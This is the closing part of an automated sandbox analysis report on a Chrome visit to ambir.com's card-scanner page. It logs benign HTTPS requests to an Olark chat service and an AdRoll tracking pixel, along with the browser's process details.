                                                                                                                                                                                              Data Ascii: src||(p=r);p||(p=new Image,d&&d[f.g]&&(p.onerror=function(l){return function(){E(d[l.g])&&e()}}(f)));p.onload=e;p.src=c[f.g]}e()}var V=["ss_"],W=s||x; V[0]in W||typeof W.execScript=="undefined"||W.execScript("var "+V[0]);for(var X;V.length&&(X=V.shift());
                                                                                                                                                                                              2024-11-20 20:28:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              148192.168.2.54990234.96.127.164431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:37 UTC591OUTGET /nrpc/c?c=create&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&g=ALL&q=precache038757109200029083&j=o0&version=loader-precache&xhttp=1&u=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&r=&ca=false&ru=false&ae= HTTP/1.1
                                                                                                                                                                                              Host: knrpc.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:38 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: TwistedWeb/22.2.0
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:38 GMT
                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 20:28:38 UTC
                                                                                                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                                                                                                              X-Rpc: nrpc-http-5d9875854f-vbt6p
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                              Content-Disposition: inline; filename="rpc.txt"
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:38 UTC781INData Raw: 33 30 31 0d 0a 7b 22 63 6f 6e 76 65 72 73 61 74 69 6f 6e 5f 68 69 73 74 6f 72 79 22 3a 20 5b 5d 2c 20 22 63 61 70 61 63 69 74 79 22 3a 20 66 61 6c 73 65 2c 20 22 73 69 74 65 5f 69 73 5f 6f 6e 6c 69 6e 65 22 3a 20 66 61 6c 73 65 2c 20 22 73 74 61 74 75 73 5f 73 74 61 74 65 22 3a 20 22 6f 66 66 6c 69 6e 65 22 2c 20 22 63 6f 6e 76 65 72 73 61 74 69 6f 6e 5f 68 61 73 5f 73 6c 6f 74 22 3a 20 66 61 6c 73 65 2c 20 22 68 61 73 5f 66 72 65 65 5f 63 68 61 74 73 22 3a 20 74 72 75 65 2c 20 22 73 69 74 65 5f 63 6f 6e 66 69 67 5f 63 68 61 6e 67 65 64 22 3a 20 66 61 6c 73 65 2c 20 22 61 73 73 65 74 73 5f 63 6f 6e 66 69 67 5f 6d 64 35 22 3a 20 22 63 38 37 64 63 37 66 30 66 36 63 36 63 34 66 39 61 35 30 37 36 31 63 61 62 35 62 38 64 61 38 36 22 2c 20 22 69 70 61 64 64 72
                                                                                                                                                                                              Data Ascii: 301{"conversation_history": [], "capacity": false, "site_is_online": false, "status_state": "offline", "conversation_has_slot": false, "has_free_chats": true, "site_config_changed": false, "assets_config_md5": "c87dc7f0f6c6c4f9a50761cab5b8da86", "ipaddr


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              149192.168.2.54989754.255.252.1684431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:37 UTC993OUTGET /segment/GXXT3DJJNNBKHGBC62RAND/PQV7D44IFRBCBMEQBHSAR6?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&cookie=&adroll_s_ref=&keyw=&p0=12769&adroll_external_data=&xa4=1&adroll_version=2.0 HTTP/1.1
                                                                                                                                                                                              Host: d.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
                                                                                                                                                                                              2024-11-20 20:28:38 UTC2134INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:38 GMT
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, *
                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                              Access-Control-Allow-Origin: https://ambir.com
                                                                                                                                                                                              Access-Control-Expose-Headers: X-Advertisable-Eid, X-Attribution-Url, X-Segment-Eid, X-Segment-Display-Name, X-Segment-Name, X-Conversion-Currency, X-Conversion-Value, X-Rule, X-Rule-Type, X-Organization-Eid, X-Pixel-Eid
                                                                                                                                                                                              Access-Control-Request-Methods: GET
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Set-Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:38 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:38 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:38 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=adroll.com
                                                                                                                                                                                              Set-Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:38 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=adroll.com
                                                                                                                                                                                              X-Advertisable-Eid: GXXT3DJJNNBKHGBC62RAND
                                                                                                                                                                                              X-Attribution-Url: https%3A%2F%2Fx.adroll.com%2Fattribution%2Ftrigger%3Ffpc%3Dd3ee31a855380a6a19350bbaa666e259%26advertisable_eid%3DGXXT3DJJNNBKHGBC62RAND%26conversion_type%3DPageView%26conversion_value%3D0.0%26currency%3DUSC%26flg%3D1%26pv%3D74305401830.21593%26arrfrr%3Dhttps%253A%252F%252Fambir.com%252Fambir-card-scanners%252F
                                                                                                                                                                                              X-Conversion-Currency:
                                                                                                                                                                                              X-Conversion-Value: 0.0
                                                                                                                                                                                              X-Organization-Eid: YK5WPZRLU5ADVBKNOYLBSZ
                                                                                                                                                                                              X-Pixel-Eid: PQV7D44IFRBCBMEQBHSAR6
                                                                                                                                                                                              X-Rule: *ambir.com/ambir-card-scanners/
                                                                                                                                                                                              X-Rule-Type: s
                                                                                                                                                                                              X-Segment-Display-Name: Card Scanner Page
                                                                                                                                                                                              X-Segment-Eid: HVMGKBGTIZBSRLNIDJBIU7
                                                                                                                                                                                              X-Segment-Name: 43d568ad
                                                                                                                                                                                              2024-11-20 20:28:38 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:15:28:04
                                                                                                                                                                                              Start date:20/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                              Start time:15:28:08
                                                                                                                                                                                              Start date:20/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                              Start time:15:28:09
                                                                                                                                                                                              Start date:20/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ambir.com/ambir-card-scanners/"
                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:15:28:46
                                                                                                                                                                                              Start date:20/11/2024
                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6160 --field-trial-handle=1924,i,8983831127746973449,12403637480214134868,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              No disassembly